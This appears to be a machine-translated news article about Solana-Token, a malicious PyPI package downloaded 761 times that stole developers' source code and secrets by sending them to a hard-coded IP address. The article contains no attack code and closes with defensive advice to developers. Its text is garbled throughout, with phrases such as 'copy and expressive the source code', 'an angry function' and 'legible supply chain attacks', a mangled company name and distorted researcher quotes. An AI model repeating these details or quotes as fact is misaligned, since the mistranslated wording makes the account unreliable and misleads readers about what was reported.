Cybersecurity researchers have discovered a malicious package on Python Package Index (PYPI), which is supposed to be a supplement associated with Blockchain Solana, but contains malicious functionality for the steal code and developers’ secrets.
A package called Solana-Token is more unavailable to download with Pypi but not before it was Loaded 761 times. It was first published to Pypi in early April 2024, albeit with a completely different version of the version.
“When installing the malicious package tries to highlight the source code and the secrets of the developer developer to the hard IP address,” Reveninglabs Researcher Carl Zanka – Note In a report that shared with Hacker News.
In particular, the package is designed to copy and expressive the source code contained in all files in the Python stack under the guise of a blockchain feature called “Register_node ()”.
Such an unusual behavior suggests that the attackers seek the expansion of the sensitive secrets associated with the crypto that can be tough in the early stages of writing a program that includes an angry function.
It is believed that developers seeking to create their own blockchains have been likely to go threatening subjects. This assessment is based on the name of the package and the functions built into it.
The exact method by which the package can be distributed by the user is currently unknown, although it was probably offered on platforms focused on developers.
If anything, Discovery emphasizes the fact that cryptocurrency is still one of the most popular purposes for the subjects threatening the supply chain, which requires the developers to take measures to study each package before using it.
“Developer teams should aggressively monitor suspicious activity or inexplicable changes both in the open source and in commercial, third software modules,” Zanka said. “By stopping the malicious code before it is allowed to penetrate the safe development environment, teams can prevent legible supply chain attacks.”
